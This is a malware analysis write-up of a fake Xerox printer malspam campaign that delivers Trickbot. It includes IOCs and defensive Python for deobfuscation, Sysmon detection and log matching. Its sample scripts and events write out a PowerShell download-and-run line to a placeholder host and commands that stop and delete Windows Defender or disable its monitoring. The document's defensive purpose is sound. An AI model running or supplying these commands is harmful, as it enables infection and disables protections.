Fake Xerox Multifunction Printer Spam Campaign Overview
A new malspam campaign has been observed in which the attacker sends phishing emails, posing as a notification from a Xerox multifunction printer, with an Office document attached.
The attached document carries an obfuscated malicious macro. When the macro runs, it uses PowerShell to contact the attacker's C&C server and silently download the Trickbot banking trojan onto the user's machine.
Flow Chart:

Technical Analysis of Fake Xerox Multifunction Printer Spam Campaign
File Name: xerox.doc
MD5: FEA55342279E4CD81D9407323C86B040
File Type: DOC
Spread Via: E-mail
Detailed description of the Fake Xerox Multifunction Printer Spam Campaign, with screenshots:
When xerox.doc is opened, Microsoft Word launches it in Protected View.

Figure 1 Enable Content (Macros Disabled)
By default, Microsoft Office opens documents that arrived from the Internet in Protected View and keeps their macros disabled, so the user has to click Enable Content before any macro can run.
If the user has turned these protections off, no warning bar appears and the macro executes as soon as the document is opened, infecting the system.
Never disable Protected View or macro blocking. In managed environments, administrators can enforce the Office policy "Block macros from running in Office files from the Internet", which removes the Enable Content button for such documents so users cannot click through the warning.
If the user clicks the Enable Content button (or Protected View is not in use), the malicious macro launches powershell.exe, which downloads the payload into the %temp% directory:
%temp%\{Random name}.exe
As shown below, WINWORD.exe spawns several child processes.

Figure 2 Process Tree
As shown below, xerox.doc contains an obfuscated malicious macro that an ordinary user cannot read or understand.

Figure 3 Obfuscated Macro Code
Deobfuscating code like this requires experience with macro obfuscation techniques.
Analysis of the macro shows that it runs a malicious PowerShell script in the background.
PowerShell script:

Figure 2 PS Script
As shown above, the attacker scrambled the PowerShell script by storing fragments of the command in multiple variables and concatenating them inside an Invoke-Expression call, so the real command only exists at run time.
Reconstructing the script shows that it contacts the C&C server and, if the server is reachable, downloads the payload to C:\Users\admin\AppData\Local\Temp\WDGLXPI.exe.
It then starts the downloaded payload (WDGLXPI.exe) on the victim's machine.
So once the Trickbot binary (MD5 05b995ea556c3116fff8b5b119e491eb) has been downloaded, powershell.exe launches it directly, as seen in the PowerShell script above.
The process tree of the Trickbot malware is shown below:
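The variable-splitting trick described above can be undone without ever running the script: replay the assignments statically and print whatever would reach Invoke-Expression. The following Python is an added example written for this page, not code from the original post or from the campaign. The SAMPLE script is constructed to match the described pattern; its URL (example.invalid), file name and variable names are placeholders, not indicators from this campaign. Environment variables such as $env:TEMP are kept symbolic as %TEMP% because the analyst's machine is not the victim's.

```python
"""Static reconstruction of a PowerShell downloader that hides its command in
variables joined inside Invoke-Expression (the pattern described above)."""
import re

# Constructed sample in the shape described above: the URL, file name and
# variable names are placeholders, not indicators from the real campaign.
SAMPLE = r"""
$m7 = 'http://example.invalid/upd';
$q2 = "ate.bin"
$z1 = $m7 + $q2
$p0 = $env:TEMP + '\WDGLXPI.exe'
$c1 = '(New-Object Net.WebClient).DownloadFile(''' + $z1 + ''',''' + $p0 + ''');'
$c2 = "Start-Process '$p0'"
Invoke-Expression ($c1 + $c2)
"""

TOKEN_RE = re.compile(r"""
    '(?P<sq>(?:[^']|'')*)'          # single-quoted literal; '' is an escaped quote
  | "(?P<dq>(?:[^"`]|`.)*)"         # double-quoted literal; ` escapes the next char
  | \$env:(?P<env>[A-Za-z_]\w*)     # environment variable, kept symbolic as %NAME%
  | \$(?P<var>[A-Za-z_]\w*)         # script variable
  | (?P<op>[+()=])                  # the only operators this pattern needs
  | (?P<sep>;|\r?\n)                # statement separators
  | (?P<word>[A-Za-z][\w-]*)        # bare words such as Invoke-Expression
  | (?P<ws>[ \t]+)
""", re.VERBOSE)
IEX_NAMES = {"invoke-expression", "iex"}
URL_RE = re.compile(r"https?://[^\s'\"<>()]+", re.I)


def tokenize(script):
    """Yield (kind, text) tokens; stop with the offset if the syntax is outside the subset handled."""
    pos = 0
    while pos < len(script):
        m = TOKEN_RE.match(script, pos)
        if not m:
            raise ValueError(f"unsupported syntax at offset {pos}: {script[pos:pos + 20]!r}")
        pos = m.end()
        if m.lastgroup != "ws":
            yield m.lastgroup, m.group(m.lastgroup)


def split_statements(tokens):
    stmt = []
    for kind, text in tokens:
        if kind == "sep":
            if stmt:
                yield stmt
            stmt = []
        else:
            stmt.append((kind, text))
    if stmt:
        yield stmt


def expand_dq(text, variables):
    """PowerShell expands $name and $env:NAME inside double quotes; do the same statically."""
    def repl(m):
        if m.group(1):
            return f"%{m.group(1)}%"
        return variables.get(m.group(2), "$" + m.group(2))
    text = re.sub(r"\$env:(\w+)|\$(\w+)", repl, text)
    return re.sub(r"`(.)", r"\1", text)          # drop the backtick escape character


def evaluate(tokens, variables):
    """Concatenate literals and already-known variables; '+' and parentheses are structural only."""
    parts = []
    for kind, text in tokens:
        if kind == "sq":
            parts.append(text.replace("''", "'"))
        elif kind == "dq":
            parts.append(expand_dq(text, variables))
        elif kind == "var":
            parts.append(variables.get(text, "$" + text))   # unknown variable stays symbolic
        elif kind == "env":
            parts.append(f"%{text}%")
        elif kind == "op":
            continue
        else:
            parts.append(text)                               # best effort for anything else
    return "".join(parts)


def deobfuscate(script):
    """Replay assignments in order and return what would reach Invoke-Expression."""
    variables, commands, unhandled = {}, [], []
    for stmt in split_statements(tokenize(script)):
        kind, text = stmt[0]
        if kind == "var" and len(stmt) > 2 and stmt[1] == ("op", "="):
            variables[text] = evaluate(stmt[2:], variables)
        elif kind == "word" and text.lower() in IEX_NAMES:
            commands.append(evaluate(stmt[1:], variables))
        else:
            unhandled.append(" ".join(t for _, t in stmt))
    return {"commands": commands, "variables": variables, "unhandled": unhandled}


def extract_urls(commands):
    return sorted({u for c in commands for u in URL_RE.findall(c)})


if __name__ == "__main__":
    result = deobfuscate(SAMPLE)
    for cmd in result["commands"]:
        print("IEX ->", cmd)
    print("URLs:", extract_urls(result["commands"]))
```

The parser deliberately covers only string literals, variables, concatenation and Invoke-Expression, which is all this obfuscation style uses; anything else ends up in the "unhandled" list rather than being guessed at, and a construct outside the subset (for example `&('I'+'EX')` or a .NET call outside a string) stops the tokenizer with the offset so the analyst knows where to look by hand.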

Figure 3 Trickbot Process Tree
As shown above, once Trickbot is running it removes the Windows Defender service (service name WinDefend) using cmd.exe and sc.exe: it first stops the service and then deletes it, so that Windows Defender cannot detect its later activity. Deleting a service requires administrative rights, so this step only succeeds if the user who opened the document was an administrator or the malware has otherwise elevated.

Figure 4 Service Deleted
As shown above in the Trickbot process tree, after deleting the service it also attempts to disable Windows Defender real-time monitoring with a PowerShell command (the Set-MpPreference -DisableRealtimeMonitoring switch is the usual way of doing this). On Windows 10 systems with Tamper Protection enabled that change is rejected, but the attempt itself is a strong indicator and worth alerting on.
Thereafter, it copies itself to %APPDATA%\vcmsd\WEHMXPJ.exe (%APPDATA% already resolves to C:\Users\<user>\AppData\Roaming, as the paths in the IOC section show).
While running in the background, it creates a scheduled task named MsSystemWatcher for persistence; the task definition is stored under C:\Windows\System32\Tasks.
Trickbot then drops its modules and their configuration files under C:\Users\admin.admin-PC\AppData\Roaming\vcmsd\Modules, as shown in the following screenshot:



Figure 5 Trickbot Modules & Config Files
As shown below, Trickbot injects into svchost.exe and from there launches several processes: svchost.exe, cmd.exe, net.exe, ipconfig.exe and nltest.exe, the last three being standard tools for enumerating the host, its network configuration and domain trusts.

Figure 6 Svchost.exe Process Tree
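The behaviour described above (Word spawning PowerShell that drops an executable under %temp%, the WinDefend stop and delete, the real-time monitoring change, the scheduled task created from a user-writable path, and the burst of net/ipconfig/nltest under svchost.exe) maps directly onto process-creation telemetry. The following Python is an added example written for this page, not code from the original post: it runs a small set of rules over constructed Sysmon-style process-creation events (Image, ParentImage, CommandLine, ParentProcessGuid). The events, GUIDs and example URL are made up for the sample, and the assumption that the MsSystemWatcher task was created with schtasks.exe is mine; none of it is telemetry from the campaign.

```python
"""Detection rules for the Trickbot behaviour chain described above, run over
constructed Sysmon-style process-creation events (not real telemetry)."""
import re
from collections import defaultdict

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
SERVICE_TOOLS = {"sc.exe", "net.exe", "net1.exe", "cmd.exe"}
RECON_TOOLS = {"net.exe", "net1.exe", "ipconfig.exe", "nltest.exe", "whoami.exe", "systeminfo.exe"}

DOWNLOAD_RE = re.compile(r"downloadfile|downloadstring|invoke-webrequest|net\.webclient|start-bitstransfer", re.I)
TEMP_EXE_RE = re.compile(r"\\temp\\[^\s'\"]+\.exe", re.I)           # payload dropped under %TEMP%
WINDEFEND_RE = re.compile(r"\b(stop|delete|config)\s+windefend\b", re.I)
MPPREF_RE = re.compile(r"set-mppreference.*-disable(realtimemonitoring|behaviormonitoring|ioavprotection)", re.I)
SCHTASKS_RE = re.compile(r"schtasks(\.exe)?\s+/create\b", re.I)
USER_PATH_RE = re.compile(r"\\(appdata|temp|programdata|public)\\", re.I)


def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()


def evaluate_event(ev):
    """Return the names of the rules a single process-creation event trips."""
    img, parent, cmd = image_name(ev["Image"]), image_name(ev["ParentImage"]), ev["CommandLine"]
    rules = []
    if parent in OFFICE_APPS and img in SCRIPT_HOSTS:
        rules.append("office_spawned_script_host")
    if img == "powershell.exe" and DOWNLOAD_RE.search(cmd) and TEMP_EXE_RE.search(cmd):
        rules.append("powershell_download_to_temp")
    if img in SERVICE_TOOLS and WINDEFEND_RE.search(cmd):
        rules.append("defender_service_tampering")
    if img == "powershell.exe" and MPPREF_RE.search(cmd):
        rules.append("defender_realtime_disabled")
    if img == "schtasks.exe" and SCHTASKS_RE.search(cmd) and USER_PATH_RE.search(ev["ParentImage"]):
        rules.append("scheduled_task_from_user_writable_path")
    return rules


def detect(events):
    """Map rule name -> event indices; recon_burst -> parent GUIDs that spawned 3+ recon tools."""
    hits, recon = defaultdict(list), defaultdict(set)
    for i, ev in enumerate(events):
        for rule in evaluate_event(ev):
            hits[rule].append(i)
        if image_name(ev["Image"]) in RECON_TOOLS:
            recon[ev["ParentProcessGuid"]].add(image_name(ev["Image"]))
    for guid, tools in recon.items():
        if len(tools) >= 3:
            hits["recon_burst"].append(guid)
    return dict(hits)


def _ev(image, parent, cmd, pguid):
    return {"Image": image, "ParentImage": parent, "CommandLine": cmd, "ParentProcessGuid": pguid}


# Constructed sample events following the chain described in the article.
TEMP = r"C:\Users\admin\AppData\Local\Temp"
ROAM = r"C:\Users\admin\AppData\Roaming\vcmsd"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
SAMPLE_EVENTS = [
    _ev(WORD, r"C:\Windows\explorer.exe", '"WINWORD.EXE" /n xerox.doc', "{EXPL}"),
    _ev(PS, WORD, rf'''powershell -w hidden -c "(New-Object Net.WebClient).DownloadFile('http://example.invalid/u.bin','{TEMP}\WDGLXPI.exe');Start-Process '{TEMP}\WDGLXPI.exe'"''', "{WORD}"),
    _ev(rf"{TEMP}\WDGLXPI.exe", PS, rf'"{TEMP}\WDGLXPI.exe"', "{PS1}"),
    _ev(r"C:\Windows\System32\cmd.exe", rf"{TEMP}\WDGLXPI.exe", "cmd.exe /c sc stop WinDefend", "{TB1}"),
    _ev(r"C:\Windows\System32\sc.exe", r"C:\Windows\System32\cmd.exe", "sc stop WinDefend", "{CMD1}"),
    _ev(r"C:\Windows\System32\sc.exe", r"C:\Windows\System32\cmd.exe", "sc delete WinDefend", "{CMD1}"),
    _ev(PS, rf"{ROAM}\WEHMXPJ.exe", "powershell Set-MpPreference -DisableRealtimeMonitoring $true", "{TB2}"),
    _ev(r"C:\Windows\System32\schtasks.exe", rf"{ROAM}\WEHMXPJ.exe", rf'schtasks /create /tn MsSystemWatcher /tr "{ROAM}\WEHMXPJ.exe" /sc minute /mo 10', "{TB2}"),
    _ev(r"C:\Windows\System32\net.exe", r"C:\Windows\System32\svchost.exe", "net view /all", "{SVC1}"),
    _ev(r"C:\Windows\System32\ipconfig.exe", r"C:\Windows\System32\svchost.exe", "ipconfig /all", "{SVC1}"),
    _ev(r"C:\Windows\System32\nltest.exe", r"C:\Windows\System32\svchost.exe", "nltest /domain_trusts", "{SVC1}"),
    _ev(r"C:\Windows\System32\sc.exe", r"C:\Windows\System32\cmd.exe", "sc query wuauserv", "{ADMIN}"),  # benign
]

if __name__ == "__main__":
    for rule, refs in detect(SAMPLE_EVENTS).items():
        print(f"{rule}: {refs}")
```

Each rule is deliberately narrow (Office parent plus script host; PowerShell download plus a .exe under \Temp\; service tampering only when the target is WinDefend) so that the benign "sc query" event at the end and the normal WINWORD start do not fire. The recon rule groups by ParentProcessGuid rather than by image name because Trickbot runs its enumeration from an injected svchost.exe, and three distinct recon tools from one svchost instance is not something Windows does on its own.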
As shown below, Trickbot attempts to connect to its C&C servers at the following addresses (TCP 447 and, over Tor, 448) and URL to exchange data:
3gihg5esw7lxg2wh.onion:448
92.38.135.78:447
185.252.213.94:447
31.148.219.201:447
185.82.218.51:447
185.174.173.173:447
As shown below, it creates a per-victim folder on the C&C server; the path includes the group tag (ser0814) and the infected computer's name (ADMIN-PC):
hxxps:// 118.200.151.113/ser0814/ADMIN-PC_xxx/64/injectDll/DEBG/browser /
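The addresses above and the two C&C URLs in the IOC section are the network indicators a responder would hunt for in proxy, firewall or DNS logs. The following Python is an added example written for this page, not code from the original post: it matches constructed proxy-log lines against the IOC sets taken from this page's lists and against a path heuristic generalised from the two C&C URLs (group tag of letters plus four digits, then COMPUTERNAME_id, then a numeric command). That heuristic, the 447/448 port check and the log format are assumptions for the example; the log lines and client identifiers are made up (the 203.0.113.x and 198.51.100.x addresses are documentation ranges).

```python
"""Match proxy-log lines against the Trickbot network IOCs listed on this page."""
import re

# Endpoints and host taken from the IOC lists on this page.
IOC_ENDPOINTS = {
    "3gihg5esw7lxg2wh.onion:448", "92.38.135.78:447", "185.252.213.94:447",
    "31.148.219.201:447", "185.82.218.51:447", "185.174.173.173:447",
}
IOC_HOSTS = {e.rsplit(":", 1)[0] for e in IOC_ENDPOINTS} | {"118.200.151.113"}
C2_PORTS = {"447", "448"}                 # low-confidence on its own; see note below
# Assumed heuristic generalised from the two C&C URLs on the page:
# /<group tag: letters + 4 digits>/<COMPUTERNAME>_<client id>/<numeric command>/...
C2_PATH_RE = re.compile(r"^/[A-Za-z]{2,5}\d{4}/[A-Z0-9-]+_[^/]+/\d+/")
# Constructed log format: timestamp client method dest:port path status
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<dest>\S+):(?P<port>\d+) (?P<path>\S+) (?P<status>\d+)$"
)


def classify(line):
    """Return the list of reasons a log line is suspicious (empty if none)."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparsed"]
    dest, port, path = m["dest"].lower(), m["port"], m["path"]
    reasons = []
    if f"{dest}:{port}" in IOC_ENDPOINTS:
        reasons.append("ioc_endpoint")
    elif dest in IOC_HOSTS:
        reasons.append("ioc_host")          # known host on a port not in the list
    if port in C2_PORTS:
        reasons.append("uncommon_port_447_448")
    if C2_PATH_RE.match(path):
        reasons.append("trickbot_c2_path")
    return reasons


def scan(lines):
    """(index, reasons) for every line that trips at least one check."""
    results = []
    for i, line in enumerate(lines):
        reasons = classify(line)
        if reasons:
            results.append((i, reasons))
    return results


# Constructed sample log; none of these lines is real traffic.
SAMPLE_LOG = [
    "2019-08-14T10:02:11Z 10.0.0.5 CONNECT 92.38.135.78:447 - 200",
    "2019-08-14T10:02:15Z 10.0.0.5 GET 118.200.151.113:443 /ser0814/ADMIN-PC_ID0001/64/injectDll/VERS/browser/ 200",
    "2019-08-14T10:03:00Z 10.0.0.7 CONNECT 203.0.113.10:447 - 200",
    "2019-08-14T10:03:05Z 10.0.0.7 GET www.example.com:443 /index.html 200",
    "2019-08-14T10:04:00Z 10.0.0.9 GET 198.51.100.4:80 /abc1234/HOST-9_ID0002/5/ 200",
]

if __name__ == "__main__":
    for i, reasons in scan(SAMPLE_LOG):
        print(i, SAMPLE_LOG[i].split()[3], reasons)
```

Two caveats apply in practice. The C&C traffic is HTTPS, so the path check only works where TLS is inspected or where the URL comes from host-based telemetry; a plain CONNECT log only yields the destination and port. And outbound TCP 447/448 is rare but not unique to Trickbot, so the port check is a triage hint to be confirmed against the IOC list or the path pattern, not an alert on its own.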
Trickbot's configuration contains a list of banks it targets; a few of the entries are:
- Wells Fargo Bank NA1604
- NLB Nova Ljubljanska Banka d.d. Ljubljana
- netteller.com
- onlinebank.com
- partnersfcu.org/OnlineBanking
- ibb.firsttrustbank1.co.uk
- netbanking.ubluk.com
- my.sjpbank.co.uk
- ebanking-ch2.ubs.com
- ebank.turkishbank.co.uk
- banking.triodos.co.uk
- infinity.icicibank.co.uk
- ibank.theaccessbankukltd.co.uk
- www.standardlife.co.uk
- www.youinvest.co.uk
- ydsbank.com
- secure.tddirectinvesting.co.uk
- www.deutschebank-dbdirect.com
- jpmcsso-uk.jpmorgan.com
- secure.aldermorebusinesssavings.co.uk
IOCs
Associated Hash
Filename:WDGLXPI.exe
MD5:05B995EA556C3116FFF8B5B119E491EB
SHA1:16EAAB0E799C4CA02867B75E7338CF5A113672E2
CRC32:B034BF12
SHA-256:0894C3EBDBBC33A7A6406511EED423C0321172C5306249F11B783EA83DE8E5E6
Filename:FAQ
MD5:1A8FBCFD74D3F43894DBA3D9B41806DE
SHA1:582E024AE7BFB507166C4F451568D7F7385EA8B4
CRC32:781A92BC
SHA-256:AEA4476B30AD66CE6BFC5D97A3B3DE9AF68666C2FF318E2F8DFD14AF0CABF0F5
Filename:info.dat
MD5:847948679F9EB942C38C12EA7B27B992
SHA1:B2DD957C591DB39C6A33F77A820CBD58AE21A1B1
CRC32:F65DE1A2
SHA-256:82E4248EA3326F824CCFC8AB0F40EBE4C79F2085199D7893C14E0A4B27A426F9
Filename:README.md
MD5:6B75B09B295113DB62B798FFA28F049A
SHA1:9C2B1C11593B6E2E020D96317C5C9EE290E98E79
CRC32:54AEC39F
SHA-256:7DC91CFE40E51C2880B40481611E6024638724C7BCCF23005BDC161CF14B306D
Filename:injectDll32
MD5:2E3B973AA67FDC9104498685AA02954C
SHA1:EF7AC76C22351FC3B3CCBFB115EA5E845D896787
CRC32:ADFCC5C8
SHA-256:6DA339B7451CC4ED60C1F3F26EBC6405F1E3C41D7D2CC0E9A2FE6590D12426ED
Filename:networkDll32
MD5:30562B6FE4D8EFDCE3783CDD0909FFE6
SHA1:05B8E3B60512EC12372B817814E436F39E2C801B
CRC32:CAED28C5
SHA-256:2BAB8BA30719A42213DB0087572E481F14DE7CDF7BFFE1A1BE17DB9F09D70525
Filename:systeminfo32
MD5:B3A9D059584418A2A0803FB0C6753EA9
SHA1:D19EF63CCEF78C785CBDE5008FBFE7721625D02F
CRC32:AE0D7F34
SHA-256:70DCCAA8296D3101E33F952EB2A927A21F428786F1F8DB724EAF918408E348CF
Filename:dinj
MD5:B6D1496A79DBD8395ADA9BA8502695E6
SHA1:2A41021423D02EF5A7B89F0528D8988C83CEAB9F
CRC32:E5EF3275
SHA-256:DC9FA7A21215C495117288E797E7F04CF805CA0EB3611F85055D393E14410945
Filename:dpost
MD5:ADB9D36A9DD0114214B3E61EC7C469F6
SHA1:667E3A824FF59A99B19613CC1DDA6960665D169F
CRC32:DC915ECF
SHA-256:5AC71D91988916BDD1397429E315D810438504337E1817002D2B2D997DE97D81
Filename:sinj
MD5:A1862E9728BE7990596DE96FBCC718CF
SHA1:6352E9829D401C07D4E5802913DD1B6CC47AA875
CRC32:4F6D7BCE
SHA-256:0A5345D92CC52B152FDA3E06EE3D049E825A9EBCC8CB15848C4F341ED654D7E3
Associated URL
hxxps:// 118.200.151.113/ser0814/ADMIN-PC_xxxxx/1/NJfuy7MRukSnP12PvuCjIxRTVp4/
hxxps:// 118.200.151.113/ser0814/ADMIN-PC_xxxxx/64/injectDll/VERS/browser/
Associated Path
C:\Users\admin.admin-pc\AppData\Roaming\vcmsd\info.dat
C:\Users\admin.admin-pc\AppData\Roaming\vcmsd\Modules\systeminfo32
C:\Users\admin.admin-pc\AppData\Roaming\Mozilla\Firefox\Profiles\renpv6dn.default\prefs.js
C:\Users\admin.admin-pc\AppData\Roaming\vcmsd\Modules\injectDll32_configs\sinj
C:\Users\admin.admin-pc\AppData\Roaming\vcmsd\Modules\injectDll32_configs\dpost
C:\Users\admin.admin-pc\AppData\Roaming\vcmsd\Modules\networkDll32
C:\Users\admin.admin-pc\AppData\Roaming\vcmsd\Modules\networkDll32_configs\dpost
Associated IP
3gihg5esw7lxg2wh.onion:448
92.38.135.78:447
185.252.213.94:447
31.148.219.201:447
185.82.218.51:447
185.174.173.173:447
Associated Registry Entry
- HKU\.DEFAULT\Software\Classes\Local Settings\MuiCache\10B\52C64B7E\LanguageList
- HKU\.DEFAULT\Software\Classes\Local Settings\MuiCache\10B\52C64B7E\@%SystemRoot%\system32\qagentrt.dll,-10
- HKU\.DEFAULT\Software\Classes\Local Settings\MuiCache\10B\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103
- HKU\.DEFAULT\Software\Classes\Local Settings\MuiCache\10B\52C64B7E\@%SystemRoot%\System32\fveui.dll,-843
- HKU\.DEFAULT\Software\Classes\Local Settings\MuiCache\10B\52C64B7E\@%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124
- HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob
These registry entries are side effects of execution rather than indicators specific to Trickbot: MuiCache is populated for any program that runs, and the AuthRoot Blob is Windows caching a public root certificate needed to validate a TLS chain. Use the file hashes, paths, scheduled task name and network indicators above for detection and treat the registry keys as corroboration only.
Tips to prevent viruses and malware from infecting your system:
- Enable your pop-up blocker: pop-ups and ads are a common way for cybercriminals to push malicious programs. Avoid clicking on untrusted sites, software offers and pop-ups, and install a reputable ad blocker for Chrome, Firefox and Internet Explorer.
- Keep Windows updated: keep your system patched through automatic Windows Update. Outdated versions of Windows are an easy target.
- Third-party installers: avoid freeware download sites, which often bundle additional software with the installer.
- Regular backups: regular backups let you recover your data if the system is infected. Back up important files to a cloud drive or an external disk.
- Always run an anti-virus: prevention is better than cure. Keep an up-to-date anti-virus product installed and, for campaigns like this one, keep Office macros blocked for documents that arrive by email.